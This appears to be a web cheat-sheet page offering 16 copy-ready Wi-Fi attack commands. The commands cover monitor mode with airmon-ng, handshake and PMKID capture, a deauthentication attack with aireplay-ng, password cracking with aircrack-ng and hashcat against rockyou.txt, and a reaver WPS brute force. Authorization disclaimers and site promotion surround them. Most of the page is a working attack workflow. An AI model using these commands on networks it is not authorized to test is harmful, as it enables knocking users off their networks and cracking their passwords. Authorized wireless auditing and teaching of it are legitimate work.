$loading...
Wireless auditing workflow for networks you own or are authorized to test — monitor mode, handshake/PMKID capture, and cracking. (16 payloads)
sudo airmon-ng check killsudo airmon-ng start wlan0sudo airodump-ng wlan0monsudo airodump-ng --band a wlan0monsudo airodump-ng --bssid AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0monsudo aireplay-ng --deauth 5 -a AA:BB:CC:DD:EE:FF -c <client> wlan0monaircrack-ng capture-01.capsudo hcxdumptool -i wlan0mon -o pmkid.pcapng --enable_status=1hcxpcapngtool -o hash.22000 pmkid.pcapngaircrack-ng -w rockyou.txt -b AA:BB:CC:DD:EE:FF capture-01.caphashcat -m 22000 hash.22000 rockyou.txthashcat -m 22000 hash.22000 -a 3 ?d?d?d?d?d?d?d?dhashcat -m 2500 capture.hccapx wordlist.txtsudo reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vvsudo airgeddon# Only test networks you own or have explicit written authorization forLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides
It's a quick-reference collection of 16 Wi-Fi payloads for testing Wi-Fi Hacking vulnerabilities during authorized penetration testing, bug bounties, and CTFs. Every payload is copy-ready and grouped by attack context.
Copy any payload straight into your authorized test. Only test systems you have explicit permission to assess.
Yes — this cheat sheet and all Wi-Fi payloads are completely free, with no account required. Everything runs in your browser.